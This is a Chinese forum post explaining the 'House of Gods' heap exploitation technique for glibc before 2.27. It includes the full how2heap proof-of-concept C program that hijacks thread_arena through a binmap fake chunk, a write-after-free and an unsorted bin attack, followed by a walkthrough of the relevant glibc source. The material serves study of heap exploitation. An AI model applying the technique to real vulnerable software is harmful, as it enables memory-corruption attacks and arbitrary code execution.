house of gods
本帖最后由 R00tkit 于 2023-10-28 07:56 编辑# house_of_gods
`glibc < 2.27`,这是一个比较有趣的利用手法。按 `house of gods` 搜索没有搜到网上对这个手法的讲解,之前的 how2heap 系列加上这个就齐了。
## 源码
```cpp
/* House of Gods PoC */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <inttypes.h>
/*
* Welcome to the House of Gods...
*
* House of Gods is an arena hijacking technique for glibc < 2.27. It supplies
* the attacker with an arbitrary write against the thread_arena symbol of
* the main thread. This can be used to replace the main_arena with a
* carefully crafted fake arena. The exploit was tested against
*
* - glibc-2.23
* - glibc-2.24
* - glibc-2.25
* - glibc-2.26
*
* Following requirements are mandatory
*
* - 8 allocs of arbitrary size to hijack the arena (+2 for ACE)
* - control over first 5 quadwords of a chunk's userdata
* - a single write-after-free bug on an unsorted chunk
* - heap address leak + libc address leak
*
* This PoC demonstrates how to leverage the House of Gods in order to hijack
* the thread_arena. But it wont explain how to escalate further to
* arbitrary code execution, since this step is trivial once the whole arena
* is under control.
*
* Also note, that the how2heap PoC might use more allocations than
* previously stated. This is intentional and has educational purposes.
*
* If you want to read the full technical description of this technique, going
* from zero to arbitrary code execution within only 10 to 11 allocations, here
* is the original document I've written
*
* https://github.com/Milo-D/house-of-gods/blob/master/rev2/HOUSE_OF_GODS.TXT
*
* I recommend reading this document while experimenting with
* the how2heap PoC.
*
* Besides that, this technique abuses a minor bug in glibc, which I have
* already submitted to bugzilla at
*
* https://sourceware.org/bugzilla/show_bug.cgi?id=29709
*
* AUTHOR: David Milosevic (milo)
*
* */
/* <--- Exploit PoC ---> */
int main(void) {
printf("=================\n");
printf("= House of Gods =\n");
printf("=================\n\n");
printf("=== Abstract ===\n\n");
printf("The core of this technique is to allocate a fakechunk overlapping\n");
printf("the binmap field within the main_arena. This fakechunk is located at\n");
printf("offset 0x850. Its sizefield can be crafted by carefully binning chunks\n");
printf("into smallbins or largebins. The binmap-chunk is then being linked into\n");
printf("the unsorted bin via a write-after-free bug in order to allocate it back\n");
printf("as an exact fit. One can now tamper with the main_arena.next pointer at\n");
printf("offset 0x868 and inject the address of a fake arena. A final unsorted bin\n");
printf("attack corrupts the narenas variable with a very large value. From there, only\n");
printf("two more allocation requests for at least 0xffffffffffffffc0 bytes of memory\n");
printf("are needed to trigger two consecutive calls to the reused_arena() function,\n");
printf("which in turn traverses the corrupted arena-list and sets thread_arena to the\n");
printf("address stored in main_arena.next - the address of the fake arena.\n\n");
printf("=== PoC ===\n\n");
printf("Okay, so let us start by allocating some chunks...\n\n");
/*
* allocate a smallchunk, for example a 0x90-chunk.
* */
void *SMALLCHUNK = malloc(0x88);
/*
* allocate the first fastchunk. We will use
* a 0x20-chunk for this purpose.
* */
void *FAST20 = malloc(0x18);
/*
* allocate a second fastchunk. This time
* a 0x40-chunk.
* */
void *FAST40 = malloc(0x38);
printf("%p is our 0x90-sized smallchunk. We will bin this chunk to forge a\n", SMALLCHUNK);
printf("fake sizefield for our binmap-chunk.\n\n");
printf("%p is our first fastchunk. Its size is 0x20.\n\n", FAST20);
printf("%p is our second fastchunk with a size of 0x40. The usecase of\n", FAST40);
printf("both fastchunks will be explained later in this PoC.\n\n");
printf("We can move our smallchunk to the unsorted bin by simply free'ing it...\n\n");
/*
* put SMALLCHUNK into the unsorted bin.
* */
free(SMALLCHUNK);
/*
* this is a great opportunity to simulate a
* libc leak. We just read the address of the
* unsorted bin and save it for later.
* */
const uint64_t leak = *((uint64_t*) SMALLCHUNK);
printf("And now we need to make a request for a chunk which can not be serviced by\n");
printf("our recently free'd smallchunk. Thus, we will make a request for a\n");
printf("0xa0-sized chunk - let us call this chunk INTM (intermediate).\n\n");
/*
* following allocation will trigger a binning
* process within the unsorted bin and move
* SMALLCHUNK to the 0x90-smallbin.
* */
void *INTM = malloc(0x98);
printf("Our smallchunk should be now in the 0x90-smallbin. This process also triggered\n");
printf("the mark_bin(m, i) macro within the malloc source code. If you inspect the\n");
printf("main_arena's binmap located at offset 0x855, you will notice that the initial\n");
printf("value of the binmap changed from 0x0 to 0x200 - which can be used as a valid\n");
printf("sizefield to bypass the unsorted bin checks.\n\n");
printf("We would also need a valid bk pointer in order to bypass the partial unlinking\n");
printf("procedure within the unsorted bin. But luckily, the main_arena.next pointer at\n");
printf("offset 0x868 points initially to the start of the main_arena itself. This fact\n");
printf("makes it possible to pass the partial unlinking without segfaulting.\n\n");
printf("So now that we have crafted our binmap-chunk, it is time to allocate it\n");
printf("from the unsorted bin. For that, we will abuse a write-after-free bug\n");
printf("on an unsorted chunk. Let us start...\n\n");
printf("First, allocate another smallchunk...\n");
/*
* recycle our previously binned smallchunk.
* Note that, it is not neccessary to recycle this
* chunk. I am doing it only to keep the heap layout
* small and compact.
* */
SMALLCHUNK = malloc(0x88);
printf("...and now move our new chunk to the unsorted bin...\n");
/*
* put SMALLCHUNK into the unsorted bin.
* */
free(SMALLCHUNK);
printf("...in order to tamper with the free'd chunk's bk pointer.\n\n");
/*
* bug: a single write-after-free bug on an
* unsorted chunk is enough to initiate the
* House of Gods technique.
* */
*((uint64_t*) (SMALLCHUNK + 0x8)) = leak + 0x7f8;
printf("Great. We have redirected the unsorted bin to our binmap-chunk.\n");
printf("But we also have corrupted the bin. Let's fix this, by redirecting\n");
printf("a second time.\n\n");
printf("The next chunk (head->bk->bk->bk) in the unsorted bin is located at the start\n");
printf("of the main-arena. We will abuse this fact and free a 0x20-chunk and a 0x40-chunk\n");
printf("in order to forge a valid sizefield and bk pointer. We will also let the 0x40-chunk\n");
printf("point to another allocated chunk (INTM) by writing to its bk pointer before\n");
printf("actually free'ing it.\n\n");
/*
* before free'ing those chunks, let us write
* the address of another chunk to the currently
* unused bk pointer of FAST40. We can reuse
* the previously requested INTM chunk for that.
*
* Free'ing FAST40 wont reset the bk pointer, thus
* we can let it point to an allocated chunk while
* having it stored in one of the fastbins.
*
* The reason behind this, is the simple fact that
* we will need to perform an unsorted bin attack later.
* And we can not request a 0x40-chunk to trigger the
* partial unlinking, since a 0x40 request will be serviced
* from the fastbins instead of the unsorted bin.
* */
*((uint64_t*) (FAST40 + 0x8)) = (uint64_t) (INTM - 0x10);
/*
* and now free the 0x20-chunk in order to forge a sizefield.
* */
free(FAST20);
/*
* and the 0x40-chunk in order to forge a bk pointer.
* */
free(FAST40);
printf("Okay. The unsorted bin should now look like this\n\n");
printf("head -> SMALLCHUNK -> binmap -> main-arena -> FAST40 -> INTM\n");
printf(" bk bk bk bk bk\n\n");
printf("The binmap attack is nearly done. The only thing left to do, is\n");
printf("to make a request for a size that matches the binmap-chunk's sizefield.\n\n");
/*
* all the hard work finally pays off...we can
* now allocate the binmap-chunk from the unsorted bin.
* */
void *BINMAP = malloc(0x1f8);
printf("After allocating the binmap-chunk, the unsorted bin should look similar to this\n\n");
printf("head -> main-arena -> FAST40 -> INTM\n");
printf(" bk bk bk\n\n");
printf("And that is a binmap attack. We've successfully gained control over a small\n");
printf("number of fields within the main-arena. Two of them are crucial for\n");
printf("the House of Gods technique\n\n");
printf(" -> main_arena.next\n");
printf(" -> main_arena.system_mem\n\n");
printf("By tampering with the main_arena.next field, we can manipulate the arena's\n");
printf("linked list and insert the address of a fake arena. Once this is done,\n");
printf("we can trigger two calls to malloc's reused_arena() function.\n\n");
printf("The purpose of the reused_arena() function is to return a non-corrupted,\n");
printf("non-locked arena from the arena linked list in case that the current\n");
printf("arena could not handle previous allocation request.\n\n");
printf("The first call to reused_arena() will traverse the linked list and return\n");
printf("a pointer to the current main-arena.\n\n");
printf("The second call to reused_arena() will traverse the linked list and return\n");
printf("a pointer to the previously injected fake arena (main_arena.next).\n\n");
printf("We can reach the reused_arena() if we meet following conditions\n\n");
printf(" - exceeding the total amount of arenas a process can have.\n");
printf(" malloc keeps track by using the narenas variable as\n");
printf(" an arena counter. If this counter exceeds the limit (narenas_limit),\n");
printf(" it will start to reuse existing arenas from the arena list instead\n");
printf(" of creating new ones. Luckily, we can set narenas to a very large\n");
printf(" value by performing an unsorted bin attack against it.\n\n");
printf(" - force the malloc algorithm to ditch the current arena.\n");
printf(" When malloc notices a failure it will start a second allocation\n");
printf(" attempt with a different arena. We can mimic an allocation failure by\n");
printf(" simply requesting too much memory i.e. 0xffffffffffffffc0 and greater.\n\n");
printf("Let us start with the unsorted bin attack. We load the address of narenas\n");
printf("minus 0x10 into the bk pointer of the currently allocated INTM chunk...\n\n");
/*
* set INTM's bk to narenas-0x10. This will
* be our target for the unsorted bin attack.
* */
*((uint64_t*) (INTM + 0x8)) = leak - 0xa40;
printf("...and then manipulate the main_arena.system_mem field in order to pass the\n");
printf("size sanity checks for the chunk overlapping the main-arena.\n\n");
/*
* this way we can abuse a heap pointer
* as a valid sizefield.
* */
*((uint64_t*) (BINMAP + 0x20)) = 0xffffffffffffffff;
printf("The unsorted bin should now look like this\n\n");
printf("head -> main-arena -> FAST40 -> INTM -> narenas-0x10\n");
printf(" bk bk bk bk\n\n");
printf("We can now trigger the unsorted bin attack by requesting the\n");
printf("INTM chunk as an exact fit.\n\n");
/*
* request the INTM chunk from the unsorted bin
* in order to trigger a partial unlinking between
* head and narenas-0x10.
* */
INTM = malloc(0x98);
printf("Perfect. narenas is now set to the address of the unsorted bin's head\n");
printf("which should be large enough to exceed the existing arena limit.\n\n");
printf("Let's proceed with the manipulation of the main_arena.next pointer\n");
printf("within our previously allocated binmap-chunk. The address we write\n");
printf("to this field will become the future value of thread_arena.\n\n");
/*
* set main_arena.next to an arbitrary address. The
* next two calls to malloc will overwrite thread_arena
* with the same address. I'll reuse INTM as fake arena.
*
* Note, that INTM is not suitable as fake arena but
* nevertheless, it is an easy way to demonstrate that
* we are able to set thread_arena to an arbitrary address.
* */
*((uint64_t*) (BINMAP + 0x8)) = (uint64_t) (INTM - 0x10);
printf("Done. Now all what's left to do is to trigger two calls to the reused_arena()\n");
printf("function by making two requests for an invalid chunksize.\n\n");
/*
* the first call will force the reused_arena()
* function to set thread_arena to the address of
* the current main-arena.
* */
malloc(0xffffffffffffffbf + 1);
/*
* the second call will force the reused_arena()
* function to set thread_arena to the address stored
* in main_arena.next - our fake arena.
* */
malloc(0xffffffffffffffbf + 1);
printf("We did it. We hijacked the thread_arena symbol and from now on memory\n");
printf("requests will be serviced by our fake arena. Let's check this out\n");
printf("by allocating a fakechunk on the stack from one of the fastbins\n");
printf("of our new fake arena.\n\n");
/*
* construct a 0x70-fakechunk on the stack...
* */
uint64_t fakechunk = {
0x0000000000000000, 0x0000000000000073,
0x4141414141414141, 0x0000000000000000
};
/*
* ...and place it in the 0x70-fastbin of our fake arena
* */
*((uint64_t*) (INTM + 0x20)) = (uint64_t) (fakechunk);
printf("Fakechunk in position at stack address %p\n", fakechunk);
printf("Target data within the fakechunk at address %p\n", &fakechunk);
printf("Its current value is %#lx\n\n", fakechunk);
printf("And after requesting a 0x70-chunk...\n");
/*
* use the fake arena to perform arbitrary allocations
* */
void *FAKECHUNK = malloc(0x68);
printf("...malloc returns us the fakechunk at %p\n\n", FAKECHUNK);
printf("Overwriting the newly allocated chunk changes the target\n");
printf("data as well: ");
/*
* overwriting the target data
* */
*((uint64_t*) (FAKECHUNK)) = 0x4242424242424242;
printf("%#lx\n", fakechunk);
/*
* confirm success
* */
assert(fakechunk == 0x4242424242424242);
return EXIT_SUCCESS;
}
```
## 前置知识
先了解一下 `binmap` 的用处。
```cpp
struct malloc_state
{
[...]
/* Bitmap of bins */
unsigned int binmap;
/* Linked list */
struct malloc_state *next;
/* Linked list for free arenas.Access to this field is serialized
by free_list_lock in arena.c.*/
struct malloc_state *next_free;
/* Number of threads attached to this arena.0 if the arena is on
the free list.Access to this field is serialized by
free_list_lock in arena.c.*/
INTERNAL_SIZE_T attached_threads;
/* Memory allocated from the system in this arena.*/
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};
```
`binmap` 在 `malloc` 过程中的下面两个场景会被修改:
1. 在遍历 `unsorted bin` 中的空闲 `chunk` 时如果将该 `chunk` 放入对应的 `small bin` 或 `large bin` 中会在 `binmap` 对应位置置位。
```cpp
mark_bin(av, victim_index);
#define mark_bin(m, i) ((m)->binmap |= idx2bit(i))
```
2. 在遍历 `small bin + large bin` 找大小不小于当前 `chunk` 的空闲 `chunk` 时如果对应 `binmap` 置位的 `bin` 是空闲的就将对应位置复位。
```cpp
av->binmap = map &= ~bit;
```
## 调试
首先申请依次申请 `SMALLCHUNK_0x90, FASTCHUNK_0x20, FASTCHUNK_0x40`,然后将 `SMALLCHUNK_0x90` 释放到 `unsorted bin` 中。
然后申请 `SMALLCHUNK_0xa0(INTM)`,这时候会触发第一个改变 `binmap` 的条件,会将 `binmap` 改为 `0x200`,我们将其作为`fake_chunk_size`,暂且叫包含 `binmap` 的 `fake_chunk` 叫 `BINMAP`。并将 `SMALLCHUNK_0x90` 放进 `small_bin_0x90` 的位置上。
然后重新申请 `SMALLCHUNK_0x90`,再将其释放到 `unsorted_bin` 中。利用 `UAF` 漏洞将其 `SMALLCHUNK_0x90.bk->&main_arena.bins`,也就是 `fake_chunk_prevsize`。 再将 `FASTCHUNK_0x40.bk->(SMALLCHUNK_0xa0)INTM`,然后释放 `FASTBIN_0x20, FASTBIN_0x40`。其中 `FASTBIN_0x20` 正好位于 `main_arena_size`的位置,其作用是确保 `main_arena` 所在的 `fake chunk` 的 `size` 大于 `2 * SIZE_SZ` 此时 `unsorted bin` 结构如下。
_(因为 `binmap` 数组是 `uint` 类型是 `4` 字节大小,所以 `fake_chunk_binmap.bk == next` ,`next` 指针指向 `&main_arena`)_
`head.bk -> SMALLCHUNK_0x90.bk -> BINMAP.bk -> main-arena.bk -> FASTCHUNK_0x40.bk -> INTM`
此时申请 `0x1f8` 大小的 `chunk` 将会把正好合适的 `BINMAP` 申请出来。之后我们考虑通过如何把 `arena` 切换到 伪造的 `arena` 上。在 `__libc_malloc` 上,我们通过 `arena_get` 来获取 `arena` 。由于 `arena` 的 `flags` 的值一般为 `0` ,因此将宏展开后发现实际上是获取的 `thread_arena` 的值。
```cpp
#define arena_get(ptr, size) \
do { \
ptr = thread_arena; \
arena_lock(ptr, size); \
} while (0)
```
在 `arena_get` 获取 `arena` 后会调用 `_int_malloc` 尝试申请内存,如果 `_int_malloc` 返回 `NULL` 则调用 `arena_get_retry` 和 `_int_malloc` 尝试再次分配内存。
```cpp
arena_get(ar_ptr, bytes);
victim = _int_malloc(ar_ptr, bytes);
/* Retry with another arena only if we were able to find a usable arena
before.*/
if (!victim && ar_ptr != NULL) {
LIBC_PROBE(memory_malloc_retry, 1, bytes);
ar_ptr = arena_get_retry(ar_ptr, bytes);
victim = _int_malloc(ar_ptr, bytes);
}
```
由于 `arena` 为 `main_arena` ,因此实际上调用的是 `arena_get2` 。
```cpp
static mstate
arena_get_retry(mstate ar_ptr, size_t bytes) {
LIBC_PROBE(memory_arena_retry, 2, bytes, ar_ptr);
if (ar_ptr != &main_arena) {
...
} else {
(void) mutex_unlock(&ar_ptr->mutex);
ar_ptr = arena_get2(bytes, ar_ptr);
}
return ar_ptr;
}
```
在 `arena_get2` 函数中,如果 `n <= narenas_limit - 1` 则调用 `_int_new_arena` 创建一个新的 `arena` 。否则调用 `reused_arena` 从现有的 `arena` 中找一个可用的 `arena`。
```cpp
static mstate internal_function arena_get2(size_t size, mstate avoid_arena) {
mstate a;
static size_t narenas_limit;
a = get_free_list(); // 调试发现返回 NULL
if (a == NULL) {
/* Nothing immediately available, so generate a new arena.*/
if (narenas_limit == 0) {
if (mp_.arena_max != 0)
narenas_limit = mp_.arena_max;
else if (narenas > mp_.arena_test) {
int n = __get_nprocs();
if (n >= 1)
narenas_limit = NARENAS_FROM_NCORES(n);
else
/* We have no information about the system.Assume two
cores.*/
narenas_limit = NARENAS_FROM_NCORES(2);
}
}
repeat:;
size_t n = narenas;
/* NB: the following depends on the fact that (size_t)0 - 1 is a
very large number and that the underflow is OK.If arena_max
is set the value of arena_test is irrelevant.If arena_test
is set but narenas is not yet larger or equal to arena_test
narenas_limit is 0.There is no possibility for narenas to
be too big for the test to always fail since there is not
enough address space to create that many arenas.*/
if (__glibc_unlikely(n <= narenas_limit - 1)) {
if (catomic_compare_and_exchange_bool_acq(&narenas, n + 1, n))
goto repeat;
a = _int_new_arena(size);
if (__glibc_unlikely(a == NULL))
catomic_decrement(&narenas);
} else
a = reused_arena(avoid_arena);
}
return a;
}
```
`reused_arena` 从 `next_to_use` 开始沿 `arena.next` 链表找第一个满足 `!arena_is_corrupt(result) && !mutex_trylock(&result->mutex)` 的 `arena` ,并且会将找到的 `arena` 赋值给 `thread_arena` ,然后更新 `next_to_use` 为下一个 `arena` 。
```cpp
static size_t narenas = 1;
static mstate
reused_arena(mstate avoid_arena) {
mstate result;
/* FIXME: Access to next_to_use suffers from data races.*/
static mstate next_to_use;
if (next_to_use == NULL)
next_to_use = &main_arena;
/* Iterate over all arenas (including those linked from
free_list).*/
result = next_to_use;
do {
if (!arena_is_corrupt(result) && !mutex_trylock(&result->mutex))
goto out;
/* FIXME: This is a data race, see _int_new_arena.*/
result = result->next;
} while (result != next_to_use);
...
out:
...
thread_arena = result;
next_to_use = result->next;
return result;
}
```
因此我们可以修改 `main_arena.next` 指向伪造的 `arena` 然后两次调用 `malloc(0xffffffffffffffbf + 1)`,(第一次调用`result==&main_arena;next_to_use==INTM`); 通过 `checked_request2size(bytes, nb);` 宏使得 `_int_malloc` 返回 `NULL`,最终使得 `thread_arena` 指向我们伪造的 `arena` 。
首先需要确保 `narenas > narenas_limit - 1` 从而调用 `reused_arena` ,因此要构造 `unsorted bin attack` 将 `narenas` 改成一个较大的数。为了确保从 `unsorted bin` 中取出的 `chunk` 能通过 `victim->size > av->system_mem` 检查,我们将 `main_arena.system_mem` 赋值为` 0xffffffffffffffff` 。将 `INTM.bk` 指向 `&narenas - 0x10` 构造 `unsorted bin attack `。
申请 `0xa0` 大小的 `chunk` (申请被构造在 `unsorted bin` 的 `INTM`)触发 `unsorted bin attack`。此时 `arenas` 上被写入了 `&main_arena.top` 。
将 `main_arena.next` 指向 `INTM` ,连续两次 `malloc(0xffffffffffffffbf + 1);` 将 `thread_arena` 指向我们伪造的 `INTM` 。
伪造如下 `fast_chunk`
之后将 `(uint64_t) (INTM_prev+0x30)` 指向伪造的 `chunk` 。
此时如果 `malloc(0x68)` 就会将目标地址处的内存申请出来。
正在学习各种house of,长知识了 辛苦啦,支持下
{:17_1077:} 不明觉厉!
页:
[1]